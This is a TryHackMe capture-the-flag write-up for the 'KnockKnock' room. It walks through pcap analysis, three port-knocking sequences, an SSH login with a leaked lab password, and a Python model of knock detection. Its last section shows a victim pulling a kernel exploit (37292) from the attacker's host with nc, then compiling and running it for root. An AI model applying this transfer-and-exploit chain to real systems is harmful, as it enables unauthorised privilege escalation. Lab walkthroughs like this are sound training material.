KnockKnock (THM)

TryHackMe KnockKnock Write-Up

topics: port knocking, web application security, Linux Privilege Escalation

  1. Plan

  2. Enumeration

  3. Local Privilege Escalation

  4. Root Privilege Escalation

new tools: knock

tools: nmap, dirsearch, wireshark, ssh, gcc, nc

Plan

First we must distinguish port knocking from port redirection/tunneling/forwarding (terms that are often used interchangeably).

What they have in common is that both are used to get past the firewall, either to reveal sensitive data or to gain access to the machine.

Enumeration

Initial nmap scan: ./nmapAutomator.sh $ip Basic


Running a dirsearch scan against the server reveals no other subdirectories.

Navigating to the webpage, we find a link to a .pcap file that we can inspect with Wireshark.

First Port Knocking

Inspecting the file with wireshark

We know that the knock consists of connections between a client and the webserver, so let's filter for TCP. From the initial ICMP (ping) requests, we can see the client is x.x.x.102 while the webserver is x.x.x.101.

We can see the client connected to the webserver on ports 7000, 8000, 9000 and 8888. We can use the tool knock to knock these ports, then a quick nmap scan to verify which port is now open, and navigate to it in a web browser.

knock $ip 7000 8000 9000 7000 8000 9000 8888 && nmap $ip

Because the firewall is configured to block these specific ports, we will have to run the knock command again after the nmap scan. I attempted to use telnet or nc to connect to the server, but it would simply refuse even after running the additional knock command.

The knock reveals that port 8888 is now open; navigate to it at http://$ip:8888.

This presents us with a hidden subdirectory. Navigating to /burgerworld reveals another .pcap file to inspect.

Second Port Knocking

We know that a light green highlight in Wireshark indicates an HTTP exchange, so let's inspect those packets first. The third one stands out because it does not use port 80 at all, which is the port we already have access to.

There is an odd-looking message in this packet; inspecting the raw hex reveals potentially sensitive data.

So we have a hidden message that appears to be German.

We were correct in assuming the message was German. It says 1337, which is more than likely a port number. Attempting to navigate to this port results in a blocked connection, so we can try knocking it.

At first, running the same knock command with port 1337 does not open the port. Inspecting the message one more time, perhaps the spaces between the digits are intentional.

knock $ip 1 3 3 7 && nmap -p1337 $ip

Navigating to http://$ip:1337 reveals another hidden subdirectory, /iamcornholio. Inspecting the subdirectory:

We are left with a string encoded in base64.

echo T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK | base64 --decode
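As an added example (my own code, not part of the original write-up or the room), the following Python pulls together the three things done by hand above: the Wireshark filter that recovers the knock order from the client's SYNs, the parsing of the hints (the spaced "1 3 3 7" from the second pcap and the base64 string from /iamcornholio), and a simplified model of how a knock daemon such as knockd decides whether a client has completed the sequence. The packet records and IP addresses are constructed, and the tracker models knockd's behaviour rather than reusing any of its code.

```python
"""Port-knocking helpers: recover a knock sequence from a capture, parse the
hints found on the box, and model how a knock daemon decides to open a port.

Added example for this write-up; none of it is the box's or knockd's code.
The packet records and IP addresses below are constructed, standing in for
what Wireshark showed in the .pcap files."""
import base64
import re
from dataclasses import dataclass, field

# Constructed capture: (src, dst, dst_port, tcp_flags). The client x.x.x.102
# knocks three closed ports on the webserver x.x.x.101 (each answered with a
# RST/ACK, "RA"), then connects to 8888, which the knock has just opened ("SA").
CLIENT, SERVER = "10.0.0.102", "10.0.0.101"
SAMPLE_PACKETS = [
    (CLIENT, SERVER, 7000, "S"), (SERVER, CLIENT, 51000, "RA"),
    (CLIENT, SERVER, 8000, "S"), (SERVER, CLIENT, 51001, "RA"),
    (CLIENT, SERVER, 9000, "S"), (SERVER, CLIENT, 51002, "RA"),
    (CLIENT, SERVER, 8888, "S"), (SERVER, CLIENT, 51003, "SA"),
]


def knock_sequence_from_capture(packets, client, server):
    """Ordered destination ports of the client's SYN-only packets to the server.
    This is the filter applied by hand in Wireshark: the knock is the sequence
    of connection attempts, whether or not the server answered them."""
    return [dport for src, dst, dport, flags in packets
            if src == client and dst == server and flags == "S"]


def ports_from_hint(text):
    """Turn a hint string into a list of ports. A base64-looking hint is
    decoded first (the /iamcornholio string decodes to 'Open up SSH: ...').
    Every whitespace-separated run of digits is its own port, so the second
    pcap's '1 3 3 7' is four knocks on ports 1, 3, 3 and 7, not one on 1337."""
    s = text.strip()
    if len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        try:
            decoded = base64.b64decode(s, validate=True).decode("ascii")
            if decoded.strip().isprintable():
                text = decoded
        except (ValueError, UnicodeDecodeError):
            pass  # not base64 after all (e.g. the bare string "1337")
    return [int(tok) for tok in re.findall(r"\d+", text)]


@dataclass
class KnockTracker:
    """Simplified model of a knock daemon such as knockd: one expected
    sequence, per-client progress, a hit on any other port resets that
    client, and the whole sequence must arrive within `timeout` seconds.
    Modelled behaviour, not knockd's implementation."""
    sequence: list
    timeout: float = 10.0
    _progress: dict = field(default_factory=dict)  # client -> (next_index, started_at)

    def knock(self, client, port, now):
        """Register one SYN from `client` to `port` at time `now`.
        Returns True when this knock completes the sequence (port opens)."""
        idx, started = self._progress.get(client, (0, now))
        if now - started > self.timeout:          # too slow: start over
            idx, started = 0, now
        if port == self.sequence[idx]:
            idx += 1
        elif port == self.sequence[0]:            # wrong port, but a fresh start
            idx, started = 1, now
        else:                                     # wrong port: progress is lost
            idx, started = 0, now
        if idx == len(self.sequence):
            self._progress.pop(client, None)
            return True
        self._progress[client] = (idx, started)
        return False


def simulate(sequence, attempts, timeout=10.0):
    """Feed (client, port, time) tuples to a fresh tracker; one bool per attempt."""
    tracker = KnockTracker(list(sequence), timeout)
    return [tracker.knock(c, p, t) for c, p, t in attempts]


if __name__ == "__main__":
    print("knock sequence seen in capture:",
          knock_sequence_from_capture(SAMPLE_PACKETS, CLIENT, SERVER))
    print("hint '1 3 3 7' ->", ports_from_hint("1 3 3 7"))
    print("SSH hint ->", ports_from_hint("T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK"))
    # the spaced sequence from the second pcap versus a single knock on 1337
    print(simulate([1, 3, 3, 7], [(CLIENT, p, i) for i, p in enumerate([1, 3, 3, 7])]))
    print(simulate([1, 3, 3, 7], [(CLIENT, 1337, 0)]))
```

The tracker is what explains the observation above: a single knock on 1337 does nothing because the daemon is waiting for port 1, and an out-of-order or stale knock throws away the client's progress, so the order and the timing of the sequence both matter.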

Local Privilege Escalation

We are told that SSH is running on one of those four ports; if we knock them and log in as butthead, we can gain local access to the webserver.

Third Port Knocking

knock $ip 8888 9999 7777 6666 && ssh butthead@$ip

Hmm, we are immediately logged out of the SSH server. Butthead's password, nachosrule, is given to us in plaintext, so maybe we can try running SSH with an exact command to execute.

ssh butthead@$ip /bin/sh

Running sudo -l shows that butthead has no sudo permissions. Listing the kernel version with uname -a reveals kernel 3.13, vulnerable to exploit 37292.

Root Privilege Escalation

Copy the C code to the attacking machine and transfer it with nc:

On the attacker: nc -nlvp 4444 < exploit.c

On the victim, cd to /tmp and run: nc <attackIP> 4444 > exploit.c

Compile the exploit and run it: gcc exploit.c -o run && ./run
